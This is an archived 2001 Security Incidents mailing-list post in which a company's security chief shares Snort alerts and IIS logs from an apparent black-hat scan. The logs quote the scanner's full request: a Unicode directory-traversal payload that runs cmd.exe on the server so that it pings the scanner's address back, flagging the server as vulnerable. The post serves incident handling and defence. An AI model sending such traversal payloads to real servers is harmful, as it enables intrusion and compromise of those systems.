Security Incidents mailing list archives
Sneaky vuln-scanning, vulnerable list generation
From: "Keith.Morgan" <Keith.Morgan () Terradon com>
Date: Fri, 27 Jul 2001 13:08:34 -0400
I don't think this is a worm. I think this is most probably a black-hat scanning technique. Note the command the scanner attempted to execute. A single ping-back to the scanning machine. This would allow the scanner to easily generate a list of vulnerable boxen. Attached are intrusion detection system and webserver logs in EST. Jul 27 11:02:30 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80 Jul 27 11:02:34 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2828 -> Pub.IP.Address:80 Jul 27 11:02:37 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2927 -> Pub.IP.Address:80 Jul 27 11:02:45 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80 Jul 27 11:02:55 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80 Jul 27 11:03:10 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80 2001-07-27 11:02:39 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwi nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 - 2001-07-27 11:02:56 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwi nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 - Keith T. Morgan Chief of Information Security Terradon Communications keith.morgan () terradon com 304-755-8291 x142 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Sneaky vuln-scanning, vulnerable list generation Keith.Morgan (Jul 29)